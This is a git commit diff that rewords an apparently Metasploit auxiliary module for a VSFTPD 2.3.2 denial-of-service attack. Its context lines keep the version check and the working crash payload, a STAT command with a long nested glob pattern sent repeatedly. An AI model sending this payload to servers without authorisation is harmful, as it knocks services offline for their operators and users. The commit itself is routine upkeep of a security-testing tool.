vsftpd_232: Improve wording

g0tmi1k · g0tmi1k · commit 5b33c8042517 · 2026-05-05T18:00:59.000+01:00
diff --git a/modules/auxiliary/dos/ftp/vsftpd_232.rb b/modules/auxiliary/dos/ftp/vsftpd_232.rb
@@ -11,10 +11,11 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'	=> 'VSFTPD 2.3.2 Denial of Service',
-        'Description'	=> %q{
+        'Name' => 'VSFTPD 2.3.2 and Earlier STAT Denial of Service',
+        'Description' => %q{
           This module triggers a Denial of Service condition in the VSFTPD server in
-          versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.
+          versions before 2.3.3 (tested on 2.3.0, 2.3.1, and 2.3.2).
+          Version 2.3.3 and higher should not be vulnerable.
         },
         'Author' => [
           'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator
@@ -45,13 +46,15 @@ def check
         print_error('Connection refused')
         return Exploit::CheckCode::Unknown('Failed to connect or authenticate via FTP')
       end
+
     rescue Rex::ConnectionRefused
       print_error('Connection refused')
       return Exploit::CheckCode::Unknown('Connection refused by the target')
     rescue Rex::ConnectionTimeout
       print_error('Connection timed out')
       return Exploit::CheckCode::Unknown('Connection timed out')
     end
+
     s = ''
     loop do
       # get each line until our desired line shows or end line shows
@@ -68,19 +71,19 @@ def check
     # pull out version and check if its in range of vulnerability
     version = s[/vsFTPd (\d+\.\d+\.\d+)/, 1]
     if Rex::Version.new(version) < Rex::Version.new('2.3.3')
-      Exploit::CheckCode::Appears("vsFTPd #{version} is older than the patched version 2.3.3")
+      Exploit::CheckCode::Appears("VSFTPD #{version} is vulnerable (affected: <= 2.3.2)")
     else
-      Exploit::CheckCode::Safe("vsFTPd #{version} is not vulnerable")
+      Exploit::CheckCode::Safe("VSFTPD #{version} is not vulnerable (affected: <= 2.3.2)")
     end
   end
 
   def run
     fail_with(Failure::NotVulnerable, 'Target is not vulnerable') if check != Exploit::CheckCode::Appears
 
     payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487
+    vprint_status("FTP command being sent: #{payload}")
 
-    vprint_status("Payload being sent: #{payload}")
-    print_status('sending payload')
+    print_status('Sending DoS command')
 
     loop do
       print('.')
@@ -98,11 +101,11 @@ def run
       print_error('Connection reset!')
     rescue Rex::ConnectionRefused
       print("\n")
-      print_good('Connection refused! Appears DOS attack succeeded')
+      print_good('Connection refused! Appears DoS attack succeeded')
       break
     rescue EOFError
       print("\n")
-      print_good('Stream was cut off abruptly. Appears DOS attack succeeded')
+      print_good('Stream was cut off abruptly. Appears DoS attack succeeded')
       break
     end
     disconnect
